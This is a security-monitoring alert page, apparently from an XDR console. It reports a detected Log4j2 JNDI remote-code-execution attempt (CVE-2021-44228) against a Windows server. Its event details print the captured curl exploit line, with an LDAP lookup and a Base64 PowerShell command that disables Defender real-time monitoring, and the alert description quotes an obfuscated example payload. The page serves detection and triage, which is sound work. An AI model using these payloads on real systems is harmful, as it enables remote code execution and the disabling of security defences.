Alerts  /  Apache Log4j2 (JNDI) Remote Code Execution 3

Apache Log4j2 (JNDI) Remote Code Execution 3

Is this alert valuable?

Details

This alert title has been seen 1 times in the last 7 days across Smiths Cogwheels, Inc.

Status:
Status Reason:
None
First Activity:
2024/02/18 12:49:23 UTC (a month ago)
Last Activity:
2024/02/18 12:57:11 UTC (a month ago)
Inserted At:
2024/02/18 12:57:04 UTC (a month ago)
Severity:
High (0.75)
Threat Score:
7.5
Tenant:
Smiths Cogwheels, Inc. (96072)
Detector:
Taegis Watchlist
Tactics:
Initial Access
Techniques:
Exploit Public-Facing Application (T1190)
Sensor Types:
Red Cloak Red Cloak
Confidence:
66%
Username:
Hostname:
WinServ-DB
Agent/Sensor ID:
b09b0d11ea98b188bdd2ddc897a73b60
Files:
cmd.exe
curl.exe
MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Investigations:
This alert has not been added to an investigation.
Occurrence Count:
2
Grouped by (Group Key):
96072:app:event-filter:process:f92ae32a-76c1-47d0-a0f6-5507f3270337:b09b0d11ea98b188bdd2ddc897a73b60:C:\curl\curl.exe:2024-02-14

Affected Agents  (1)

ENDPOINT_REDCLOAKWinServ-DB
Last Updated:
2024/03/31 13:21:57 UTC
OS Distributor:
Microsoft
OS Family:
WINDOWS
OS Version:
VERSION_SERVER_2016
Most Recent Address:
10.24.22.50 

Open alerts (0) for Related Entities

Open alerts within past 72 hours from alert creation
NO DATA
Agent/Sensor ID (b09b0d11ea98b188bdd2ddc897a73b60)
0
Files (cmd.exe +1 more)
0
Hostname (WinServ-DB)
0
MD5 (16fae319be8f1e29b2be6fcd5aad9dc2)
0
SHA1 (52bbeefca172e7d38ddf0fae750e3c98549ad3d7)
0
Similar Alert Titles based on Rule ID (f92ae32a-76c1-47d0-a0f6-5507f3270337)
0
Username (WINSERV-DB\Administrator)
0

Closed alerts (69) for Related Entities

Closed alerts within past 30 days from alert creation
Not Actionable (2)True Positive Malicious (48)Suppressed (19)
Agent/Sensor ID (b09b0d11ea98b188bdd2ddc897a73b60)
0
Files (cmd.exe +1 more)
2
48
19
69
Hostname (WinServ-DB)
0
MD5 (16fae319be8f1e29b2be6fcd5aad9dc2)
0
SHA1 (52bbeefca172e7d38ddf0fae750e3c98549ad3d7)
0
Similar Alert Titles based on Rule ID (f92ae32a-76c1-47d0-a0f6-5507f3270337)
0
Username (WINSERV-DB\Administrator)
0

Open or closed investigations (0) for Related Entities

Open or closed investigations within past 30 days
File Hashes (16fae319be8f1e29b2be6fcd5aad9dc2 +1 more)
0
Files (curl.exe +1 more)
0
Host (b09b0d11ea98b188bdd2ddc897a73b60)
0
User (WINSERV-DB\Administrator)
0
Alert Description
Counter Threat Unit™
A process event with a command line that features a syntax for a Java Naming and Directory Interface (JNDI) lookup function was identified. This activity may indicate that a threat actor is attempting to execute code associated with a known remote code execution (RCE) vulnerability, CVE-2021-44228. Example: > curl -H X-Api-Version: ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} JNDI allows software clients to discover and look up data and objects via a name. A threat actor can store these objects in various naming or directory services, such as Remote Method Invocation (RMI), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS). An attacker who can control log messages or log message parameters can exploit CVE-2021-44228 to execute arbitrary code loaded from a server (e.g., LDAP) when message lookup substitution is enabled.

External References

Log4j vulnerability CVE-2021-44228 under active exploitation  Learn more

GitHub | tangxiaofeng7 / CVE-2021-44228-Apache-Log4j-Rce  Learn more

First Event Details

We are showing the First Event Details out of 2 events. If you want to see more, please go to Events tab.

Process
Command Line: 
curl  "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Event Time:
2024/02/18 12:49:23 UTC · a month ago
Ingest Time:
2024/02/18 12:56:55 UTC · a month ago
Process ID:
1856
Image Path:
C:\curl\curl.exe  (Admin)
Parent Process ID:
640
Parent Image Path:
C:\Windows\System32\cmd.exe
Username:
WINSERV-DB\Administrator (Admin)
Hostname:
Red Cloak
WinServ-DB
Sensor ID:
b09b0d11ea98b188bdd2ddc897a73b60

Related File Data

File Name:
curl.exe
MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process Data (2)
1 - 2 in 2

2024/02/18 12:49:23 UTC - Source Event

View Event

Command Line:

curl  "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Ingest Time:
2024/02/18 12:56:55 UTC (a month ago)
Parent Image Path:
C:\Windows\System32\cmd.exe
Program Hash MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
Program Hash SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process ID:
1856
Process Create Time:
2024/02/18 12:49:23 UTC (a month ago)

2024/02/18 12:53:01 UTC

View Event

Command Line:

curl  "10.24.22.10:8080" -H "X-Api-Version: ${jndi:ldap://10.24.22.50:1389/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWNvbW1hbmQgIlNldC1NcFByZWZlcmVuY2UgLURpc2FibGVSZWFsdGltZU1vbml0b3JpbmcgJHRydWUi}"
Ingest Time:
2024/02/18 12:57:11 UTC (a month ago)
Parent Image Path:
C:\Windows\System32\cmd.exe
Program Hash MD5:
16fae319be8f1e29b2be6fcd5aad9dc2
Program Hash SHA1:
52bbeefca172e7d38ddf0fae750e3c98549ad3d7
Process ID:
1928
Process Create Time:
2024/02/18 12:53:01 UTC (a month ago)